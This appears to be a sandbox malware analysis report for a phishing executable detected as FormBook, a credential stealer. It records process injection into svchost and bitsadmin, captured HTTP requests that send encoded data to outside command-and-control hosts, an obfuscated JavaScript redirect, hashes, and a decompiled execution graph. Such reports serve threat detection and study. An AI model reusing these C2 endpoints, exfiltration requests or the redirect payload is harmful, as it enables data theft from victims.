                                                        Data Raw: 6c 4a 6f 4c 6c 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 61 45 33 79 36 58 7a 77 33 6b 46 5a 76 32 49 41 57 78 68 66 78 4b 78 56 43 79 66 71 37 49 2b 74 73 5a 58 51 67 57 6c 63 54 5a 68 70 30 33 78 42 6d 6c 63 74 45 4d 58 6a 4c 43 79 31 78 6b 59 46 43 6a 71 45 6c 6e 74 5a 77 41 70 73 62 59 5a 74 4d 79 68 6b 49 55 6d 50 36 49 49 61 50 4d 43 43 71 72 76 50 31 68 70 34 71 31 44 45 4a 57 4f 2f 6b 41 57 7a 69 77 4d 55 61 4c 33 44 78 72 66 78 69 48 75 31 45 65 37 64 36 6e 4a 67 7a 6c 6c 67 32 55 35 78 55 56 41 55 6d 4b 32 77 65 30 46 6e 72 6d 41 47 63 58 65 76 52 67 46 79 4b 6d 6f 6c 75 48 45 45 77 73 66 50 37 63 4f 6f 30 63 4f 6b 61 35 64 6b 66 41 51 6f 65 6c 6b 66 33 71 67 59 74 2b 76 4b 61 59 2f 54 50 70 7a 72 4b 77 72 2b 69 44 2b 57 65 4c 51 55 2b 6d 77 53 56 6f 78 74 56 46 37 5a 74 69 72 2f 57 31 57 55 52 46 53 4b 44 61 62 56 4f 36 61 30 43 68 66 6b 50 48 65 31 35 4c 73 6a 73 4b 56 51 44 58 31 6d 38 51 55 50 43 4e [TRUNCATED]
                                                        Data Ascii: lJoLl=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnaE3y6Xzw3kFZv2IAWxhfxKxVCyfq7I+tsZXQgWlcTZhp03xBmlctEMXjLCy1xkYFCjqElntZwApsbYZtMyhkIUmP6IIaPMCCqrvP1hp4q1DEJWO/kAWziwMUaL3DxrfxiHu1Ee7d6nJgzllg2U5xUVAUmK2we0FnrmAGcXevRgFyKmoluHEEwsfP7cOo0cOka5dkfAQoelkf3qgYt+vKaY/TPpzrKwr+iD+WeLQU+mwSVoxtVF7Ztir/W1WURFSKDabVO6a0ChfkPHe15LsjsKVQDX1m8QUPCNZFvB4xMfFuWfhj/742OnP/VhvklvvYdLEY5pE1p01QtJ95jQVCd0E5GO1o882pc4M0pD12z1+pKhCKoLcy+54JA9dlbQPydFo9eFxVphr3Ar1pYlW47KFN2MtniQMopZgXN1a60exWORh2owbbp0WnG7KmBHrAUq3Rk91aXINWxuiGG1llbLxWhb1IoV0dg1UHe1vcXkVWcHMv+bRE7s9zntbt6oSArnGY+Wwme56rEAubqX0Ps/yQ94OQInR4xDWhTz19w2QXs2fy9Zh9QLBhiEo4xFKsqVtsKYpEbjWe13jBOLRfiVtG/qbPjiPmNj3Yj7bxw9KjayOxx5fYcopF0BGG9tam+/js9sdsAcWJglMlC3q8kx0xsWlVNVCRafqOu9L2y0/Bt3GwhaXq7u3M0YQUhKcNGF2TV16wHljrO7VcBIGeAmbaDnqluEfW8//tDhsLhpqctwtBH+b1x/BQLMFCqkC8aQMspM8uGnafPvpmu/rGug/NCqIIc3U8SvDgbOt93VjUXkf00vWLf1HiUxpy534cY/p7i8P8DdZMxpT19bQt3tCthLZLT7EgM8Z2cLxWL4NLuQGV0/8a8IfZZx5+dgUO5NW7MpvfKTQ9XRVCO84xNNekiTD1uauX0SIU01M37tGTQNvGi72nr2PROcK7OYn0Od2R [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.550007154.88.22.101802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:30:13.425357103 CET490OUTGET /jhb8/?lJoLl=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmvnYE4/ya8ROpqJGzP2nxEXACS10Z064kir5KyXbYyrXZl7w==&QjtpF=dVl4 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.t91rl7.pro
                                                        Connection: close
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Nov 28, 2024 09:30:14.923063040 CET327INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 28 Nov 2024 08:30:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Strict-Transport-Security: max-age=31536000
                                                        Data Raw: 35 61 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 38 30 4f 44 56 6c 4c 6e 51 35 4d 54 68 68 61 79 35 77 63 6d 38 36 4f 44 6b 78 4d 51 3d 3d 27 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 5a<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly80ODVlLnQ5MThhay5wcm86ODkxMQ==')</script>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.550008209.74.77.107802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:30:20.542620897 CET765OUTPOST /alu5/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.learnwithus.site
                                                        Origin: http://www.learnwithus.site
                                                        Referer: http://www.learnwithus.site/alu5/
                                                        Cache-Control: no-cache
                                                        Content-Length: 206
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 58 4e 6c 6f 47 32 4a 41 4d 4f 41 62 66 2b 45 70 6a 44 62 49 4a 74 6c 70 79 4a 63 56 30 4f 46 46 64 34 45 4c 31 52 36 41 6e 4a 75 61 71 79 78 76 54 30 76 6e 37 50 78 42 4d 37 36 52 30 63 74 71 2b 52 63 39 38 58 56 77 72 47 4c 58 36 6e 72 6e 35 46 48 76 32 66 43 49 4d 4b 72 79 76 49 4a 57 39 4b 4f 59 79 43 6c 34 4a 2f 42 61 67 66 7a 34 45 53 78 6c 79 6a 44 59 45 44 36 77 6e 66 45 56 52 6a 56 42 59 61 6f 50 79 33 35 55 6b 32 4e 66 41 5a 70 42 33 69 4b 4a 32 6a 49 4d 79 66 4b 67 35 53 54 43 6b 78 52 76 6c 64 71 58 2b 77 64 67 64 48 48 4c 48 31 33 53 51 67 51 3d
                                                        Data Ascii: lJoLl=r+fOQXLoIUMlXNloG2JAMOAbf+EpjDbIJtlpyJcV0OFFd4EL1R6AnJuaqyxvT0vn7PxBM76R0ctq+Rc98XVwrGLX6nrn5FHv2fCIMKryvIJW9KOYyCl4J/Bagfz4ESxlyjDYED6wnfEVRjVBYaoPy35Uk2NfAZpB3iKJ2jIMyfKg5STCkxRvldqX+wdgdHHLH13SQgQ=


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30192.168.2.550009209.74.77.10780
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:30:23.508573055 CET785OUTPOST /alu5/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.learnwithus.site
                                                        Origin: http://www.learnwithus.site
                                                        Referer: http://www.learnwithus.site/alu5/
                                                        Cache-Control: no-cache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 57 73 56 6f 45 56 78 41 4f 75 41 63 56 65 45 70 70 6a 62 45 4a 74 70 70 79 49 49 46 30 34 39 46 64 64 67 4c 30 51 36 41 6b 4a 75 61 68 53 77 45 4e 45 76 53 37 50 74 2f 4d 2b 61 52 30 63 35 71 2b 56 51 39 38 41 42 7a 6f 32 4c 56 32 48 72 70 6d 31 48 76 32 66 43 49 4d 4b 58 4d 76 4d 64 57 39 61 2b 59 79 6a 6c 37 41 66 42 5a 71 2f 7a 34 41 53 77 73 79 6a 43 50 45 42 43 4b 6e 63 73 56 52 6d 35 42 59 49 4d 4d 6f 6e 35 6f 67 32 4e 4a 4d 38 55 59 37 42 47 30 72 52 35 32 6d 73 43 49 31 45 69 6f 2b 54 5a 48 32 39 47 76 75 6a 56 58 4d 33 6d 69 64 57 6e 69 4f 33 48 7a 49 59 73 61 6c 2f 55 67 57 31 57 44 42 35 47 45 73 31 64 76
                                                        Data Ascii: lJoLl=r+fOQXLoIUMlWsVoEVxAOuAcVeEppjbEJtppyIIF049FddgL0Q6AkJuahSwENEvS7Pt/M+aR0c5q+VQ98ABzo2LV2Hrpm1Hv2fCIMKXMvMdW9a+Yyjl7AfBZq/z4ASwsyjCPEBCKncsVRm5BYIMMon5og2NJM8UY7BG0rR52msCI1Eio+TZH29GvujVXM3midWniO3HzIYsal/UgW1WDB5GEs1dv
                                                        Nov 28, 2024 09:30:24.718559980 CET533INHTTP/1.1 404 Not Found
                                                        Date: Thu, 28 Nov 2024 08:30:24 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:03:27:16
                                                        Start date:28/11/2024
                                                        Path:C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"
                                                        Imagebase:0xb60000
                                                        File size:1'230'336 bytes
                                                        MD5 hash:981E91572B25BCE71C737BAE5D1A2363
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:03:27:18
                                                        Start date:28/11/2024
                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"
                                                        Imagebase:0xaa0000
                                                        File size:46'504 bytes
                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2255087515.0000000000A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2254901007.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2255503523.0000000005400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:03:27:33
                                                        Start date:28/11/2024
                                                        Path:C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe"
                                                        Imagebase:0x740000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3860205283.00000000046F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:5
                                                        Start time:03:27:36
                                                        Start date:28/11/2024
                                                        Path:C:\Windows\SysWOW64\bitsadmin.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\bitsadmin.exe"
                                                        Imagebase:0x5f0000
                                                        File size:186'880 bytes
                                                        MD5 hash:F57A03FA0E654B393BB078D1C60695F3
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3859242171.0000000000310000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3859423484.0000000002740000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3859475868.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:03:27:48
                                                        Start date:28/11/2024
                                                        Path:C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe"
                                                        Imagebase:0x740000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3861800488.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:7
                                                        Start time:03:27:59
                                                        Start date:28/11/2024
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff79f9e0000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:3.9%
                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                          Signature Coverage:7.1%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:60
                                                          execution_graph 94557 bd19dd 94562 b64a30 94557->94562 94559 bd19f1 94582 b80f0a 52 API calls __cinit 94559->94582 94561 bd19fb 94563 b64a40 __ftell_nolock 94562->94563 94583 b6d7f7 94563->94583 94567 b64aff 94595 b6363c 94567->94595 94574 b6d7f7 48 API calls 94575 b64b32 94574->94575 94617 b649fb 94575->94617 94577 b64b43 Mailbox 94577->94559 94579 b664cf 48 API calls 94580 b64b3d _wcscat Mailbox __NMSG_WRITE 94579->94580 94580->94577 94580->94579 94581 b661a6 48 API calls 94580->94581 94631 b6ce19 94580->94631 94581->94580 94582->94561 94637 b7f4ea 94583->94637 94585 b6d818 94586 b7f4ea 48 API calls 94585->94586 94587 b64af6 94586->94587 94588 b65374 94587->94588 94668 b8f8a0 94588->94668 94591 b6ce19 48 API calls 94592 b653a7 94591->94592 94670 b6660f 94592->94670 94594 b653b1 Mailbox 94594->94567 94596 b63649 __ftell_nolock 94595->94596 94717 b6366c GetFullPathNameW 94596->94717 94598 b6365a 94599 b66a63 48 API calls 94598->94599 94600 b63669 94599->94600 94601 b6518c 94600->94601 94602 b65197 94601->94602 94603 bd1ace 94602->94603 94604 b6519f 94602->94604 94606 b66b4a 48 API calls 94603->94606 94719 b65130 94604->94719 94608 bd1adb __NMSG_WRITE 94606->94608 94607 b64b18 94611 b664cf 94607->94611 94609 b7ee75 48 API calls 94608->94609 94610 bd1b07 ___crtGetEnvironmentStringsW 94609->94610 94612 b6651b 94611->94612 94616 b664dd ___crtGetEnvironmentStringsW 94611->94616 94614 b7f4ea 48 API calls 94612->94614 94613 b7f4ea 48 API calls 94615 b64b29 94613->94615 94614->94616 94615->94574 94616->94613 94734 b6bcce 94617->94734 94620 bd41cc RegQueryValueExW 94622 bd41e5 94620->94622 94623 bd4246 RegCloseKey 94620->94623 94621 b64a2b 94621->94580 94624 b7f4ea 48 API calls 94622->94624 94625 bd41fe 94624->94625 94740 b647b7 94625->94740 94628 bd423b 94628->94623 94629 bd4224 94630 b66a63 48 API calls 94629->94630 94630->94628 94632 b6ce28 __NMSG_WRITE 94631->94632 94633 b7ee75 48 API calls 94632->94633 94634 b6ce50 ___crtGetEnvironmentStringsW 94633->94634 94635 b7f4ea 48 API calls 94634->94635 94636 b6ce66 94635->94636 94636->94580 94639 b7f4f2 __calloc_impl 94637->94639 94640 b7f50c 94639->94640 94641 b7f50e std::exception::exception 94639->94641 94646 b8395c 94639->94646 94640->94585 94660 b86805 RaiseException 94641->94660 94643 b7f538 94661 b8673b 47 API calls _free 94643->94661 94645 b7f54a 94645->94585 94647 b839d7 __calloc_impl 94646->94647 94657 b83968 __calloc_impl 94646->94657 94667 b87c0e 47 API calls __getptd_noexit 94647->94667 94648 b83973 94648->94657 94662 b881c2 47 API calls __NMSG_WRITE 94648->94662 94663 b8821f 47 API calls 6 library calls 94648->94663 94664 b81145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94648->94664 94651 b8399b RtlAllocateHeap 94653 b839cf 94651->94653 94651->94657 94653->94639 94654 b839c3 94665 b87c0e 47 API calls __getptd_noexit 94654->94665 94657->94648 94657->94651 94657->94654 94658 b839c1 94657->94658 94666 b87c0e 47 API calls __getptd_noexit 94658->94666 94660->94643 94661->94645 94662->94648 94663->94648 94665->94658 94666->94653 94667->94653 94669 b65381 GetModuleFileNameW 94668->94669 94669->94591 94671 b8f8a0 __ftell_nolock 94670->94671 94672 b6661c GetFullPathNameW 94671->94672 94677 b66a63 94672->94677 94674 b66643 94688 b66571 94674->94688 94678 b66adf 94677->94678 94680 b66a6f __NMSG_WRITE 94677->94680 94705 b6b18b 94678->94705 94681 b66ad7 94680->94681 94682 b66a8b 94680->94682 94704 b6c369 48 API calls 94681->94704 94692 b66b4a 94682->94692 94685 b66a95 94695 b7ee75 94685->94695 94687 b66ab6 ___crtGetEnvironmentStringsW 94687->94674 94689 b6657f 94688->94689 94690 b6b18b 48 API calls 94689->94690 94691 b6658f 94690->94691 94691->94594 94693 b7f4ea 48 API calls 94692->94693 94694 b66b54 94693->94694 94694->94685 94697 b7f4ea __calloc_impl 94695->94697 94696 b8395c _W_store_winword 47 API calls 94696->94697 94697->94696 94698 b7f50c 94697->94698 94699 b7f50e std::exception::exception 94697->94699 94698->94687 94709 b86805 RaiseException 94699->94709 94701 b7f538 94710 b8673b 47 API calls _free 94701->94710 94703 b7f54a 94703->94687 94704->94687 94706 b6b199 94705->94706 94708 b6b1a2 ___crtGetEnvironmentStringsW 94705->94708 94706->94708 94711 b6bdfa 94706->94711 94708->94687 94709->94701 94710->94703 94712 b6be0d 94711->94712 94713 b6be0a ___crtGetEnvironmentStringsW 94711->94713 94714 b7f4ea 48 API calls 94712->94714 94713->94708 94715 b6be17 94714->94715 94716 b7ee75 48 API calls 94715->94716 94716->94713 94718 b6368a 94717->94718 94718->94598 94720 b6513f __NMSG_WRITE 94719->94720 94721 b65151 94720->94721 94722 bd1b27 94720->94722 94729 b6bb85 94721->94729 94724 b66b4a 48 API calls 94722->94724 94726 bd1b34 94724->94726 94725 b6515e ___crtGetEnvironmentStringsW 94725->94607 94727 b7ee75 48 API calls 94726->94727 94728 bd1b57 ___crtGetEnvironmentStringsW 94727->94728 94730 b6bb9b 94729->94730 94733 b6bb96 ___crtGetEnvironmentStringsW 94729->94733 94731 bd1b77 94730->94731 94732 b7ee75 48 API calls 94730->94732 94732->94733 94733->94725 94735 b64a0a RegOpenKeyExW 94734->94735 94736 b6bce8 94734->94736 94735->94620 94735->94621 94737 b7f4ea 48 API calls 94736->94737 94738 b6bcf2 94737->94738 94739 b7ee75 48 API calls 94738->94739 94739->94735 94741 b7f4ea 48 API calls 94740->94741 94742 b647c9 RegQueryValueExW 94741->94742 94742->94628 94742->94629 94743 bd9bec 94746 b70ae0 Mailbox ___crtGetEnvironmentStringsW 94743->94746 94745 b71526 Mailbox 94930 bacc5c 86 API calls 4 library calls 94745->94930 94746->94745 94754 b6ffe1 Mailbox 94746->94754 94768 b6ce19 48 API calls 94746->94768 94774 b6fec8 94746->94774 94778 b7f4ea 48 API calls 94746->94778 94780 bda706 94746->94780 94782 b997ed InterlockedDecrement 94746->94782 94800 b6fe30 94746->94800 94829 bb6ff0 94746->94829 94838 bc0d1d 94746->94838 94841 bc0d09 94746->94841 94844 bbf0ac 94746->94844 94876 baa6ef 94746->94876 94882 bbe822 94746->94882 94923 bbef61 82 API calls 2 library calls 94746->94923 94749 b7f4ea 48 API calls 94749->94774 94750 b7146e 94760 b66eed 48 API calls 94750->94760 94756 bda922 94757 b71473 94932 bacc5c 86 API calls 4 library calls 94757->94932 94758 bda246 94924 b66eed 94758->94924 94759 b70509 94933 bacc5c 86 API calls 4 library calls 94759->94933 94760->94754 94763 b66eed 48 API calls 94763->94774 94765 bda873 94766 bda30e 94766->94754 94928 b997ed InterlockedDecrement 94766->94928 94767 b6d7f7 48 API calls 94767->94774 94768->94746 94769 b80f0a 52 API calls __cinit 94769->94774 94770 b997ed InterlockedDecrement 94770->94774 94772 bda973 94934 bacc5c 86 API calls 4 library calls 94772->94934 94774->94749 94774->94750 94774->94754 94774->94757 94774->94758 94774->94759 94774->94763 94774->94766 94774->94767 94774->94769 94774->94770 94774->94772 94777 b715b5 94774->94777 94786 b71d10 94774->94786 94922 b71820 335 API calls 2 library calls 94774->94922 94775 bda982 94931 bacc5c 86 API calls 4 library calls 94777->94931 94778->94746 94929 bacc5c 86 API calls 4 library calls 94780->94929 94782->94746 94787 b71ed6 94786->94787 94788 b71d2a 94786->94788 94789 b72357 94787->94789 94794 b71f55 94787->94794 94796 b71e9a Mailbox 94787->94796 94799 b71eba 94787->94799 94788->94787 94788->94789 94791 b71e0b 94788->94791 94788->94799 94789->94799 94938 ba9f44 58 API calls wcstoxq 94789->94938 94793 b71e47 94791->94793 94791->94794 94791->94799 94793->94796 94798 bdbfc4 94793->94798 94793->94799 94794->94796 94794->94799 94936 b997ed InterlockedDecrement 94794->94936 94796->94799 94937 b8203b 58 API calls __wtof_l 94796->94937 94935 b8203b 58 API calls __wtof_l 94798->94935 94799->94774 94801 b6fe50 94800->94801 94812 b6fe7e 94800->94812 94802 b7f4ea 48 API calls 94801->94802 94802->94812 94803 b80f0a 52 API calls __cinit 94803->94812 94804 b7146e 94805 b66eed 48 API calls 94804->94805 94811 b6ffe1 94805->94811 94806 b6d7f7 48 API calls 94806->94812 94807 b70509 94943 bacc5c 86 API calls 4 library calls 94807->94943 94809 b71d10 59 API calls 94809->94812 94811->94746 94812->94803 94812->94804 94812->94806 94812->94807 94812->94809 94812->94811 94813 b7f4ea 48 API calls 94812->94813 94815 b71473 94812->94815 94816 bda246 94812->94816 94817 b66eed 48 API calls 94812->94817 94822 bda30e 94812->94822 94823 b997ed InterlockedDecrement 94812->94823 94825 bda973 94812->94825 94828 b715b5 94812->94828 94939 b71820 335 API calls 2 library calls 94812->94939 94813->94812 94814 bda922 94814->94746 94942 bacc5c 86 API calls 4 library calls 94815->94942 94819 b66eed 48 API calls 94816->94819 94817->94812 94819->94811 94821 bda873 94821->94746 94822->94811 94940 b997ed InterlockedDecrement 94822->94940 94823->94812 94944 bacc5c 86 API calls 4 library calls 94825->94944 94827 bda982 94941 bacc5c 86 API calls 4 library calls 94828->94941 94945 b6936c 94829->94945 94831 bb702a 94965 b6b470 94831->94965 94833 bb703a 94834 bb705f 94833->94834 94835 b6fe30 335 API calls 94833->94835 94837 bb7063 94834->94837 94993 b6cdb9 48 API calls 94834->94993 94835->94834 94837->94746 95016 bbf8ae 94838->95016 94840 bc0d2d 94840->94746 94842 bbf8ae 129 API calls 94841->94842 94843 bc0d19 94842->94843 94843->94746 94845 b6d7f7 48 API calls 94844->94845 94846 bbf0c0 94845->94846 94847 b6d7f7 48 API calls 94846->94847 94848 bbf0c8 94847->94848 94849 b6d7f7 48 API calls 94848->94849 94850 bbf0d0 94849->94850 94851 b6936c 81 API calls 94850->94851 94864 bbf0de 94851->94864 94852 b66a63 48 API calls 94852->94864 94853 b6c799 48 API calls 94853->94864 94854 bbf2cc 94855 bbf2f9 Mailbox 94854->94855 95153 b66b68 48 API calls 94854->95153 94855->94746 94856 bbf2b3 94859 b6518c 48 API calls 94856->94859 94858 bbf2ce 94860 b6518c 48 API calls 94858->94860 94862 bbf2c0 94859->94862 94863 bbf2dd 94860->94863 94861 b66eed 48 API calls 94861->94864 95144 b6510d 94862->95144 94867 b6510d 48 API calls 94863->94867 94864->94852 94864->94853 94864->94854 94864->94855 94864->94856 94864->94858 94864->94861 94865 b6bdfa 48 API calls 94864->94865 94868 b6bdfa 48 API calls 94864->94868 94873 b6936c 81 API calls 94864->94873 94874 b6518c 48 API calls 94864->94874 94875 b6510d 48 API calls 94864->94875 94869 bbf175 CharUpperBuffW 94865->94869 94867->94854 94870 bbf23a CharUpperBuffW 94868->94870 95133 b6d645 94869->95133 95143 b7d922 55 API calls 2 library calls 94870->95143 94873->94864 94874->94864 94875->94864 94877 baa6fb 94876->94877 94878 b7f4ea 48 API calls 94877->94878 94879 baa709 94878->94879 94880 baa717 94879->94880 94881 b6d7f7 48 API calls 94879->94881 94880->94746 94881->94880 94883 bbe868 94882->94883 94884 bbe84e 94882->94884 95168 bbccdc 48 API calls 94883->95168 95167 bacc5c 86 API calls 4 library calls 94884->95167 94887 bbe871 94888 b6fe30 334 API calls 94887->94888 94889 bbe8cf 94888->94889 94890 bbe96a 94889->94890 94892 bbe916 94889->94892 94915 bbe860 Mailbox 94889->94915 94891 bbe978 94890->94891 